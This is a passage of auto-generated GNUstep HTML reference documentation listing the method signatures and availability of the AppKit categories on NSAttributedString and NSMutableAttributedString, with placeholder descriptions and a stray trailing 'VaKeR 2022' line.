    <h3><a name="method$NSAttributedString(AppKit)-rangeOfTextBlock$atIndex$">rangeOfTextBlock:&nbsp;atIndex:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>) <b>rangeOfTextBlock:</b> (NSTextBlock*)block<b> atIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-rangeOfTextList$atIndex$">rangeOfTextList:&nbsp;atIndex:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>) <b>rangeOfTextList:</b> (NSTextList*)list<b> atIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-rangeOfTextTable$atIndex$">rangeOfTextTable:&nbsp;atIndex:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>) <b>rangeOfTextTable:</b> (NSTextTable*)table<b> atIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-rulerAttributesInRange$">rulerAttributesInRange:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*) <b>rulerAttributesInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>

          <h1><a name="002000000000">
        Software documentation for the
        NSMutableAttributedString(AppKit)
        category
      </a></h1>
    <h2><a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSAttributedString.html#class$NSMutableAttributedString">NSMutableAttributedString</a>(<a name="category$NSMutableAttributedString(AppKit)">AppKit</a>)</h2>
    <blockquote class="declared">
      <dl>
        <dt><b>Declared in:</b></dt>
        <dd>AppKit/NSAttributedString.h</dd>
      </dl>
    </blockquote>
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
          <em>Description forthcoming.</em>
        
    </div>
    <b>Method summary</b>
    <ul>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-applyFontTraits$range$">-applyFontTraits:range:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-fixAttachmentAttributeInRange$">-fixAttachmentAttributeInRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-fixAttributesInRange$">-fixAttributesInRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-fixFontAttributeInRange$">-fixFontAttributeInRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-fixParagraphStyleAttributeInRange$">-fixParagraphStyleAttributeInRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-readFromData$options$documentAttributes$">-readFromData:options:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-readFromData$options$documentAttributes$error$">-readFromData:options:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-readFromURL$options$documentAttributes$">-readFromURL:options:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-readFromURL$options$documentAttributes$error$">-readFromURL:options:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-setAlignment$range$">-setAlignment:range:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-setBaseWritingDirection$range$">-setBaseWritingDirection:range:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-subscriptRange$">-subscriptRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-superscriptRange$">-superscriptRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-unscriptRange$">-unscriptRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSMutableAttributedString(AppKit)-updateAttachmentsFromPath$">-updateAttachmentsFromPath:</a></li>
    </ul>
    <hr width="50%" align="left" />
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-applyFontTraits$range$">applyFontTraits:&nbsp;range:&nbsp;</a></h3>
    - (void) <b>applyFontTraits:</b> (<a rel="gsdoc" href="TypesAndConstants.html#type$NSFontTraitMask">NSFontTraitMask</a>)traitMask<b> range:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-fixAttachmentAttributeInRange$">fixAttachmentAttributeInRange:&nbsp;</a></h3>
    - (void) <b>fixAttachmentAttributeInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-fixAttributesInRange$">fixAttributesInRange:&nbsp;</a></h3>
    - (void) <b>fixAttributesInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-fixFontAttributeInRange$">fixFontAttributeInRange:&nbsp;</a></h3>
    - (void) <b>fixFontAttributeInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-fixParagraphStyleAttributeInRange$">fixParagraphStyleAttributeInRange:&nbsp;</a></h3>
    - (void) <b>fixParagraphStyleAttributeInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-readFromData$options$documentAttributes$">readFromData:&nbsp;options:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (BOOL) <b>readFromData:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)documentAttributes;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.3.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-readFromData$options$documentAttributes$error$">readFromData:&nbsp;options:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (BOOL) <b>readFromData:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)documentAttributes<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-readFromURL$options$documentAttributes$">readFromURL:&nbsp;options:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (BOOL) <b>readFromURL:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSURL.html#class$NSURL">NSURL</a>*)url<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)documentAttributes;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-readFromURL$options$documentAttributes$error$">readFromURL:&nbsp;options:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (BOOL) <b>readFromURL:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSURL.html#class$NSURL">NSURL</a>*)url<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)documentAttributes<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-setAlignment$range$">setAlignment:&nbsp;range:&nbsp;</a></h3>
    - (void) <b>setAlignment:</b> (<a rel="gsdoc" href="TypesAndConstants.html#type$NSTextAlignment">NSTextAlignment</a>)alignment<b> range:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-setBaseWritingDirection$range$">setBaseWritingDirection:&nbsp;range:&nbsp;</a></h3>
    - (void) <b>setBaseWritingDirection:</b> (<a rel="gsdoc" href="TypesAndConstants.html#type$NSWritingDirection">NSWritingDirection</a>)writingDirection<b> range:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-subscriptRange$">subscriptRange:&nbsp;</a></h3>
    - (void) <b>subscriptRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-superscriptRange$">superscriptRange:&nbsp;</a></h3>
    - (void) <b>superscriptRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-unscriptRange$">unscriptRange:&nbsp;</a></h3>
    - (void) <b>unscriptRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSMutableAttributedString(AppKit)-updateAttachmentsFromPath$">updateAttachmentsFromPath:&nbsp;</a></h3>
    - (void) <b>updateAttachmentsFromPath:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSString.html#class$NSString">NSString</a>*)path;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
    <br />
    <a href="Gui.html">Up</a>
    </font>
</body>
</html>

VaKeR 2022